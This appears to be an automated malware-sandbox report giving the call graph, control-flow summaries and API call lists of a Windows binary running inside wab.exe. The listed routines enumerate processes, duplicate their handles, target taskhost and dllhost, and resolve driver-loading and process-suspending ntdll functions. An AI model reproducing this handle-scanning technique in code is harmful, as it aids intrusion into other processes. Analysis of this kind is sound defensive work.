39576->39577 39578 40ce3e 39577->39578 39579 40ce6a 39578->39579 39610 40abb7 wcslen memmove 39578->39610 39580 40ce9f 39579->39580 39613 40abb7 wcslen memmove 39579->39613 39582 40a8d0 7 API calls 39580->39582 39586 40ceb5 39582->39586 39583 40ce56 39611 40aa71 wcslen 39583->39611 39585 40ce8b 39614 40aa71 wcslen 39585->39614 39592 40a8d0 7 API calls 39586->39592 39589 40ce5e 39612 40abb7 wcslen memmove 39589->39612 39590 40ce93 39615 40abb7 wcslen memmove 39590->39615 39594 40cecb 39592->39594 39616 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39594->39616 39596 40cedd 39597 40aa04 ??3@YAXPAX 39596->39597 39598 40cee5 39597->39598 39599 40aa04 ??3@YAXPAX 39598->39599 39600 40ceed 39599->39600 39601 40aa04 ??3@YAXPAX 39600->39601 39601->39571 39603 40aa33 39602->39603 39604 40aa63 39602->39604 39605 40aa44 39603->39605 39606 40aa38 wcslen 39603->39606 39604->39571 39604->39575 39607 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39605->39607 39606->39605 39608 40aa4d 39607->39608 39608->39604 39609 40aa51 memcpy 39608->39609 39609->39604 39610->39583 39611->39589 39612->39579 39613->39585 39614->39590 39615->39580 39616->39596 39617->39557 39618->38714 39619->38722 39620 44dea5 39621 44deb5 FreeLibrary 39620->39621 39622 44dec3 39620->39622 39621->39622 39623 4147f3 39626 414561 39623->39626 39625 414813 39627 41456d 39626->39627 39628 41457f GetPrivateProfileIntW 39626->39628 39631 4143f1 memset _itow WritePrivateProfileStringW 39627->39631 39628->39625 39630 41457a 39630->39625 39631->39630 39632 4287c1 39633 4287d2 39632->39633 39634 429ac1 39632->39634 39635 428818 39633->39635 39636 42881f 39633->39636 39642 425711 39633->39642 39647 425ad6 39634->39647 39702 415c56 11 API calls 39634->39702 39669 42013a 39635->39669 39697 420244 97 API calls 39636->39697 39641 4260dd 39696 424251 120 API calls 39641->39696 39642->39634 39644 4259da 39642->39644 39650 422aeb memset memcpy memcpy 39642->39650 39651 429a4d 39642->39651 39654 4260a1 39642->39654 39665 4259c2 39642->39665 39668 425a38 39642->39668 39685 4227f0 memset memcpy 39642->39685 39686 422b84 15 API calls 39642->39686 39687 422b5d memset memcpy memcpy 39642->39687 39688 422640 13 API calls 39642->39688 39690 4241fc 11 API calls 39642->39690 39691 42413a 90 API calls 39642->39691 39695 416760 11 API calls 39644->39695 39650->39642 39652 429a66 39651->39652 39656 429a9b 39651->39656 39698 415c56 11 API calls 39652->39698 39694 415c56 11 API calls 39654->39694 39657 429a96 39656->39657 39700 416760 11 API calls 39656->39700 39701 424251 120 API calls 39657->39701 39660 429a7a 39699 416760 11 API calls 39660->39699 39665->39647 39689 415c56 11 API calls 39665->39689 39668->39665 39692 422640 13 API calls 39668->39692 39693 4226e0 12 API calls 39668->39693 39670 42014c 39669->39670 39673 420151 39669->39673 39712 41e466 97 API calls 39670->39712 39672 420162 39672->39642 39673->39672 39674 4201b3 39673->39674 39675 420229 39673->39675 39676 4201b8 39674->39676 39677 4201dc 39674->39677 39675->39672 39678 41fd5e 86 API calls 39675->39678 39703 41fbdb 39676->39703 39677->39672 39681 4201ff 39677->39681 39709 41fc4c 39677->39709 39678->39672 39681->39672 39684 42013a 97 API calls 39681->39684 39684->39672 39685->39642 39686->39642 39687->39642 39688->39642 39689->39644 39690->39642 39691->39642 39692->39668 39693->39668 39694->39644 39695->39641 39696->39647 39697->39642 39698->39660 39699->39657 39700->39657 39701->39634 39702->39644 39704 41fbf1 39703->39704 39705 41fbf8 39703->39705 39708 41fc39 39704->39708 39727 4446ce 11 API calls 39704->39727 39717 41ee26 39705->39717 39708->39672 39713 41fd5e 39708->39713 39710 41ee6b 86 API calls 39709->39710 39711 41fc5d 39710->39711 39711->39677 39712->39673 39715 41fd65 39713->39715 39714 41fdab 39714->39672 39715->39714 39716 41fbdb 86 API calls 39715->39716 39716->39715 39718 41ee41 39717->39718 39719 41ee32 39717->39719 39728 41edad 39718->39728 39731 4446ce 11 API calls 39719->39731 39722 41ee3c 39722->39704 39725 41ee58 39725->39722 39733 41ee6b 39725->39733 39727->39708 39737 41be52 39728->39737 39731->39722 39732 41eb85 11 API calls 39732->39725 39734 41ee70 39733->39734 39735 41ee78 39733->39735 39790 41bf99 86 API calls 39734->39790 39735->39722 39738 41be6f 39737->39738 39739 41be5f 39737->39739 39745 41be8c 39738->39745 39769 418c63 memset memset 39738->39769 39768 4446ce 11 API calls 39739->39768 39742 41be69 39742->39722 39742->39732 39743 41bee7 39743->39742 39773 41a453 86 API calls 39743->39773 39745->39742 39745->39743 39746 41bf3a 39745->39746 39749 41bed1 39745->39749 39772 4446ce 11 API calls 39746->39772 39748 41bef0 39748->39743 39751 41bf01 39748->39751 39749->39748 39752 41bee2 39749->39752 39750 41bf24 memset 39750->39742 39751->39750 39753 41bf14 39751->39753 39770 418a6d memset memcpy memset 39751->39770 39758 41ac13 39752->39758 39771 41a223 memset memcpy memset 39753->39771 39757 41bf20 39757->39750 39759 41ac52 39758->39759 39760 41ac3f memset 39758->39760 39763 41ac6a 39759->39763 39774 41dc14 19 API calls 39759->39774 39761 41acd9 39760->39761 39761->39743 39765 41aca1 39763->39765 39775 41519d 39763->39775 39765->39761 39766 41acc0 memset 39765->39766 39767 41accd memcpy 39765->39767 39766->39761 39767->39761 39768->39742 39769->39745 39770->39753 39771->39757 39772->39743 39774->39763 39778 4175ed 39775->39778 39786 417570 SetFilePointer 39778->39786 39781 41760a ReadFile 39782 417637 39781->39782 39783 417627 GetLastError 39781->39783 39784 4151b3 39782->39784 39785 41763e memset 39782->39785 39783->39784 39784->39765 39785->39784 39787 4175b2 39786->39787 39788 41759c GetLastError 39786->39788 39787->39781 39787->39784 39788->39787 39789 4175a8 GetLastError 39788->39789 39789->39787 39790->39735 39791 417bc5 39793 417c61 39791->39793 39797 417bda 39791->39797 39792 417bf6 UnmapViewOfFile CloseHandle 39792->39792 39792->39797 39795 417c2c 39795->39797 39803 41851e 20 API calls 39795->39803 39797->39792 39797->39793 39797->39795 39798 4175b7 39797->39798 39799 4175d6 FindCloseChangeNotification 39798->39799 39800 4175c8 39799->39800 39801 4175df 39799->39801 39800->39801 39802 4175ce Sleep 39800->39802 39801->39797 39802->39799 39803->39795 39804 415304 ??3@YAXPAX 39805 4152c6 malloc 39806 4152e2 39805->39806 39807 4152ef 39805->39807 39809 416760 11 API calls 39807->39809 39809->39806 39810 4148b6 FindResourceW 39811 4148f9 39810->39811 39812 4148cf SizeofResource 39810->39812 39812->39811 39813 4148e0 LoadResource 39812->39813 39813->39811 39814 4148ee LockResource 39813->39814 39814->39811 39815 441b3f 39825 43a9f6 39815->39825 39817 441b61 39998 4386af memset 39817->39998 39819 44189a 39820 4418e2 39819->39820 39824 442bd4 39819->39824 39822 4418ea 39820->39822 39999 4414a9 12 API calls 39820->39999 39824->39822 40000 441409 memset 39824->40000 39826 43aa20 39825->39826 39827 43aadf 39825->39827 39826->39827 39828 43aa34 memset 39826->39828 39827->39817 39829 43aa56 39828->39829 39830 43aa4d 39828->39830 40001 43a6e7 39829->40001 40009 42c02e memset 39830->40009 39835 43aad3 40011 4169a7 11 API calls 39835->40011 39836 43aaae 39836->39827 39836->39835 39851 43aae5 39836->39851 39837 43ac18 39840 43ac47 39837->39840 40013 42bbd5 memcpy memcpy memcpy memset memcpy 39837->40013 39841 43aca8 39840->39841 40014 438eed 16 API calls 39840->40014 39845 43acd5 39841->39845 40016 4233ae 11 API calls 39841->40016 39844 43ac87 40015 4233c5 16 API calls 39844->40015 40017 423426 11 API calls 39845->40017 39849 43ace1 40018 439811 163 API calls 39849->40018 39850 43a9f6 161 API calls 39850->39851 39851->39827 39851->39837 39851->39850 40012 439bbb 22 API calls 39851->40012 39853 43acfd 39858 43ad2c 39853->39858 40019 438eed 16 API calls 39853->40019 39855 43ad19 40020 4233c5 16 API calls 39855->40020 39857 43ad58 40021 44081d 163 API calls 39857->40021 39858->39857 39861 43add9 39858->39861 40025 423426 11 API calls 39861->40025 39862 43ae3a memset 39863 43ae73 39862->39863 40026 42e1c0 147 API calls 39863->40026 39864 43adab 40023 438c4e 163 API calls 39864->40023 39865 43ad6c 39865->39827 39865->39864 40022 42370b memset memcpy memset 39865->40022 39869 43adcc 40024 440f84 12 API calls 39869->40024 39870 43ae96 40027 42e1c0 147 API calls 39870->40027 39873 43aea8 39874 43aec1 39873->39874 40028 42e199 147 API calls 39873->40028 39876 43af00 39874->39876 40029 42e1c0 147 API calls 39874->40029 39876->39827 39879 43af1a 39876->39879 39880 43b3d9 39876->39880 40030 438eed 16 API calls 39879->40030 39885 43b3f6 39880->39885 39886 43b4c8 39880->39886 39881 43b60f 39881->39827 40089 4393a5 17 API calls 39881->40089 39884 43af2f 40031 4233c5 16 API calls 39884->40031 40071 432878 12 API calls 39885->40071 39896 43b4f2 39886->39896 40077 42bbd5 memcpy memcpy memcpy memset memcpy 39886->40077 39888 43af51 40032 423426 11 API calls 39888->40032 39891 43af7d 40033 423426 11 API calls 39891->40033 39895 43af94 40034 423330 11 API calls 39895->40034 40078 43a76c 21 API calls 39896->40078 39897 43b529 40079 44081d 163 API calls 39897->40079 39898 43b462 40073 423330 11 API calls 39898->40073 39902 43b428 39902->39898 40072 432b60 16 API calls 39902->40072 39903 43afca 40035 423330 11 API calls 39903->40035 39904 43b47e 39908 43b497 39904->39908 40074 42374a memcpy memset memcpy memcpy memcpy 39904->40074 39905 43b544 39906 43b55c 39905->39906 40080 42c02e memset 39905->40080 40081 43a87a 163 API calls 39906->40081 40075 4233ae 11 API calls 39908->40075 39910 43afdb 40036 4233ae 11 API calls 39910->40036 39914 43b4b1 40076 423399 11 API calls 39914->40076 39916 43b56c 39919 43b58a 39916->39919 40082 423330 11 API calls 39916->40082 39918 43afee 40037 44081d 163 API calls 39918->40037 40083 440f84 12 API calls 39919->40083 39920 43b4c1 40085 42db80 163 API calls 39920->40085 39925 43b592 40084 43a82f 16 API calls 39925->40084 39928 43b5b4 40086 438c4e 163 API calls 39928->40086 39930 43b5cf 40087 42c02e memset 39930->40087 39932 43b005 39932->39827 39937 43b01f 39932->39937 40038 42d836 163 API calls 39932->40038 39933 43b1ef 40048 4233c5 16 API calls 39933->40048 39935 43b212 40049 423330 11 API calls 39935->40049 39937->39933 40046 423330 11 API calls 39937->40046 40047 42d71d 163 API calls 39937->40047 39939 43b087 40039 4233ae 11 API calls 39939->40039 39940 43add4 39940->39881 40088 438f86 16 API calls 39940->40088 39943 43b22a 40050 42ccb5 11 API calls 39943->40050 39946 43b23f 40051 4233ae 11 API calls 39946->40051 39947 43b10f 40042 423330 11 API calls 39947->40042 39949 43b257 40052 4233ae 11 API calls 39949->40052 39953 43b129 40043 4233ae 11 API calls 39953->40043 39954 43b26e 40053 4233ae 11 API calls 39954->40053 39957 43b09a 39957->39947 40040 42cc15 19 API calls 39957->40040 40041 4233ae 11 API calls 39957->40041 39958 43b282 40054 43a87a 163 API calls 39958->40054 39960 43b13c 40044 440f84 12 API calls 39960->40044 39962 43b29d 40055 423330 11 API calls 39962->40055 39965 43b2af 39968 43b2b8 39965->39968 39969 43b2ce 39965->39969 39966 43b15f 40045 4233ae 11 API calls 39966->40045 40056 4233ae 11 API calls 39968->40056 40057 440f84 12 API calls 39969->40057 39972 43b2c9 40059 4233ae 11 API calls 39972->40059 39973 43b2da 40058 42370b memset memcpy memset 39973->40058 39976 43b2f9 40060 423330 11 API calls 39976->40060 39978 43b30b 40061 423330 11 API calls 39978->40061 39980 43b325 40062 423399 11 API calls 39980->40062 39982 43b332 40063 4233ae 11 API calls 39982->40063 39984 43b354 40064 423399 11 API calls 39984->40064 39986 43b364 40065 43a82f 16 API calls 39986->40065 39988 43b370 40066 42db80 163 API calls 39988->40066 39990 43b380 40067 438c4e 163 API calls 39990->40067 39992 43b39e 40068 423399 11 API calls 39992->40068 39994 43b3ae 40069 43a76c 21 API calls 39994->40069 39996 43b3c3 40070 423399 11 API calls 39996->40070 39998->39819 39999->39822 40000->39824 40002 43a6f5 40001->40002 40004 43a765 40001->40004 40002->40004 40090 42a115 40002->40090 40004->39827 40010 4397fd memset 40004->40010 40007 43a73d 40007->40004 40008 42a115 147 API calls 40007->40008 40008->40004 40009->39829 40010->39836 40011->39827 40012->39851 40013->39840 40014->39844 40015->39841 40016->39845 40017->39849 40018->39853 40019->39855 40020->39858 40021->39865 40022->39864 40023->39869 40024->39940 40025->39862 40026->39870 40027->39873 40028->39874 40029->39874 40030->39884 40031->39888 40032->39891 40033->39895 40034->39903 40035->39910 40036->39918 40037->39932 40038->39939 40039->39957 40040->39957 40041->39957 40042->39953 40043->39960 40044->39966 40045->39937 40046->39937 40047->39937 40048->39935 40049->39943 40050->39946 40051->39949 40052->39954 40053->39958 40054->39962 40055->39965 40056->39972 40057->39973 40058->39972 40059->39976 40060->39978 40061->39980 40062->39982 40063->39984 40064->39986 40065->39988 40066->39990 40067->39992 40068->39994 40069->39996 40070->39940 40071->39902 40072->39898 40073->39904 40074->39908 40075->39914 40076->39920 40077->39896 40078->39897 40079->39905 40080->39906 40081->39916 40082->39919 40083->39925 40084->39920 40085->39928 40086->39930 40087->39940 40088->39881 40089->39827 40091 42a175 40090->40091 40093 42a122 40090->40093 40091->40004 40096 42b13b 147 API calls 40091->40096 40093->40091 40094 42a115 147 API calls 40093->40094 40097 43a174 40093->40097 40121 42a0a8 147 API calls 40093->40121 40094->40093 40096->40007 40111 43a196 40097->40111 40112 43a19e 40097->40112 40098 43a306 40098->40111 40130 4388c4 14 API calls 40098->40130 40101 42a115 147 API calls 40101->40112 40103 43a642 40103->40111 40151 4169a7 11 API calls 40103->40151 40107 43a635 40150 42c02e memset 40107->40150 40111->40093 40112->40098 40112->40101 40112->40111 40122 42ff8c 40112->40122 40138 415a91 40112->40138 40142 4165ff 40112->40142 40145 439504 13 API calls 40112->40145 40146 4312d0 147 API calls 40112->40146 40147 42be4c memcpy memcpy memcpy memset memcpy 40112->40147 40148 43a121 11 API calls 40112->40148 40114 4169a7 11 API calls 40115 43a325 40114->40115 40115->40103 40115->40107 40115->40111 40115->40114 40116 42b5b5 memset memcpy 40115->40116 40117 42bf4c 14 API calls 40115->40117 40120 4165ff 11 API calls 40115->40120 40131 42b63e 40115->40131 40149 42bfcf memcpy 40115->40149 40116->40115 40117->40115 40120->40115 40121->40093 40152 43817e 40122->40152 40124 42ff99 40125 42ffe3 40124->40125 40126 42ffd0 40124->40126 40129 42ff9d 40124->40129 40157 4169a7 11 API calls 40125->40157 40156 4169a7 11 API calls 40126->40156 40129->40112 40130->40115 40304 42b4ec 40131->40304 40133 42b64c 40310 42b5e4 memset 40133->40310 40135 42b65e 40136 42b66d 40135->40136 40311 42b3c6 11 API calls 40135->40311 40136->40115 40139 415a9d 40138->40139 40140 415ab3 40139->40140 40141 415aa4 memset 40139->40141 40140->40112 40141->40140 40312 4165a0 40142->40312 40145->40112 40146->40112 40147->40112 40148->40112 40149->40115 40150->40103 40151->40111 40153 438187 40152->40153 40155 438192 40152->40155 40158 4380f6 40153->40158 40155->40124 40156->40129 40157->40129 40160 43811f 40158->40160 40159 438164 40159->40155 40160->40159 40162 4300e8 3 API calls 40160->40162 40163 437e5e 40160->40163 40162->40160 40186 437d3c 40163->40186 40165 437eb3 40165->40160 40166 437ea9 40166->40165 40171 437f22 40166->40171 40201 41f432 40166->40201 40169 437f06 40248 415c56 11 API calls 40169->40248 40173 437f7f 40171->40173 40174 432d4e 3 API calls 40171->40174 40172 437f95 40249 415c56 11 API calls 40172->40249 40173->40172 40175 43802b 40173->40175 40174->40173 40177 4165ff 11 API calls 40175->40177 40178 438054 40177->40178 40212 437371 40178->40212 40181 43806b 40182 438094 40181->40182 40250 42f50e 138 API calls 40181->40250 40184 4300e8 3 API calls 40182->40184 40185 437fa3 40182->40185 40184->40185 40185->40165 40251 41f638 104 API calls 40185->40251 40187 437d69 40186->40187 40190 437d80 40186->40190 40252 437ccb 11 API calls 40187->40252 40189 437d76 40189->40166 40190->40189 40191 437da3 40190->40191 40192 437d90 40190->40192 40194 438460 134 API calls 40191->40194 40192->40189 40256 437ccb 11 API calls 40192->40256 40197 437dcb 40194->40197 40195 437de8 40255 424f26 123 API calls 40195->40255 40197->40195 40253 444283 13 API calls 40197->40253 40199 437dfc 40254 437ccb 11 API calls 40199->40254 40202 41f54d 40201->40202 40208 41f44f 40201->40208 40203 41f466 40202->40203 40286 41c635 memset memset 40202->40286 40203->40169 40203->40171 40208->40203 40210 41f50b 40208->40210 40257 41f1a5 40208->40257 40282 41c06f memcmp 40208->40282 40283 41f3b1 90 API calls 40208->40283 40284 41f398 86 API calls 40208->40284 40210->40202 40210->40203 40285 41c295 86 API calls 40210->40285 40287 41703f 40212->40287 40214 437399 40215 43739d 40214->40215 40217 4373ac 40214->40217 40294 4446ea 11 API calls 40215->40294 40218 416935 16 API calls 40217->40218 40219 4373ca 40218->40219 40220 438460 134 API calls 40219->40220 40225 4251c4 137 API calls 40219->40225 40229 415a91 memset 40219->40229 40232 43758f 40219->40232 40244 437584 40219->40244 40247 437d3c 135 API calls 40219->40247 40295 425433 13 API calls 40219->40295 40296 425413 17 API calls 40219->40296 40297 42533e 16 API calls 40219->40297 40298 42538f 16 API calls 40219->40298 40299 42453e 123 API calls 40219->40299 40220->40219 40221 4375bc 40223 415c7d 16 API calls 40221->40223 40224 4375d2 40223->40224 40226 4442e6 11 API calls 40224->40226 40246 4373a7 40224->40246 40225->40219 40227 4375e2 40226->40227 40227->40246 40302 444283 13 API calls 40227->40302 40229->40219 40300 42453e 123 API calls 40232->40300 40235 4375f4 40238 437620 40235->40238 40239 43760b 40235->40239 40237 43759f 40240 416935 16 API calls 40237->40240 40242 416935 16 API calls 40238->40242 40303 444283 13 API calls 40239->40303 40240->40244 40242->40246 40244->40221 40301 42453e 123 API calls 40244->40301 40245 437612 memcpy 40245->40246 40246->40181 40247->40219 40248->40165 40249->40185 40250->40182 40251->40165 40252->40189 40253->40199 40254->40195 40255->40189 40256->40189 40258 41bc3b 101 API calls 40257->40258 40259 41f1b4 40258->40259 40260 41edad 86 API calls 40259->40260 40267 41f282 40259->40267 40261 41f1cb 40260->40261 40262 41f1f5 memcmp 40261->40262 40263 41f20e 40261->40263 40261->40267 40262->40263 40264 41f21b memcmp 40263->40264 40263->40267 40265 41f326 40264->40265 40268 41f23d 40264->40268 40266 41ee6b 86 API calls 40265->40266 40265->40267 40266->40267 40267->40208 40268->40265 40269 41f28e memcmp 40268->40269 40271 41c8df 56 API calls 40268->40271 40269->40265 40270 41f2a9 40269->40270 40270->40265 40273 41f308 40270->40273 40274 41f2d8 40270->40274 40272 41f269 40271->40272 40272->40265 40275 41f287 40272->40275 40276 41f27a 40272->40276 40273->40265 40280 4446ce 11 API calls 40273->40280 40277 41ee6b 86 API calls 40274->40277 40275->40269 40278 41ee6b 86 API calls 40276->40278 40279 41f2e0 40277->40279 40278->40267 40281 41b1ca memset 40279->40281 40280->40265 40281->40267 40282->40208 40283->40208 40284->40208 40285->40202 40286->40203 40288 417044 40287->40288 40289 41705c 40287->40289 40291 416760 11 API calls 40288->40291 40293 417055 40288->40293 40290 417075 40289->40290 40292 41707a 11 API calls 40289->40292 40290->40214 40291->40293 40292->40288 40293->40214 40294->40246 40295->40219 40296->40219 40297->40219 40298->40219 40299->40219 40300->40237 40301->40221 40302->40235 40303->40245 40305 42b4ff 40304->40305 40306 415a91 memset 40305->40306 40307 42b52c 40306->40307 40308 42b553 memcpy 40307->40308 40309 42b545 40307->40309 40308->40309 40309->40133 40310->40135 40311->40136 40317 415cfe 40312->40317 40322 415d23 __aullrem __aulldvrm 40317->40322 40324 41628e 40317->40324 40318 4163ca 40331 416422 11 API calls 40318->40331 40320 416172 memset 40320->40322 40321 416422 10 API calls 40321->40322 40322->40318 40322->40320 40322->40321 40323 415cb9 10 API calls 40322->40323 40322->40324 40323->40322 40325 416520 40324->40325 40326 416527 40325->40326 40330 416574 40325->40330 40328 416544 40326->40328 40326->40330 40332 4156aa 11 API calls 40326->40332 40329 416561 memcpy 40328->40329 40328->40330 40329->40330 40330->40112 40331->40324 40332->40328 40333 441819 40336 430737 40333->40336 40335 441825 40337 430756 40336->40337 40349 43076d 40336->40349 40338 430774 40337->40338 40339 43075f 40337->40339 40350 43034a 40338->40350 40361 4169a7 11 API calls 40339->40361 40342 4307ce 40343 430819 memset 40342->40343 40354 415b2c 40342->40354 40343->40349 40344 43077e 40344->40342 40347 4307fa 40344->40347 40344->40349 40346 4307e9 40346->40343 40346->40349 40362 4169a7 11 API calls 40347->40362 40349->40335 40351 430359 40350->40351 40352 43034e 40350->40352 40351->40344 40363 415c23 memcpy 40352->40363 40355 415b42 40354->40355 40360 415b46 40354->40360 40356 415b94 40355->40356 40358 415b5a 40355->40358 40355->40360 40357 4438b5 10 API calls 40356->40357 40357->40360 40359 415b79 memcpy 40358->40359 40358->40360 40359->40360 40360->40346 40361->40349 40362->40349 40363->40351 40364 41493c EnumResourceNamesW

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                  • memset.MSVCRT ref: 0040DF5F
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 594330280-3398334509
                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 594 413ee4 590->594 595 413ee7-413efe 590->595 604 413ea2-413eae CloseHandle 592->604 598 413e61-413e68 593->598 599 413e37-413e44 GetModuleHandleW 593->599 594->595 595->580 598->592 601 413e6a-413e76 598->601 599->598 600 413e46-413e5c GetProcAddress 599->600 600->598 601->592 604->583
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                  • memset.MSVCRT ref: 00413D7F
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                  • memset.MSVCRT ref: 00413E07
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 912665193-1740548384
                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
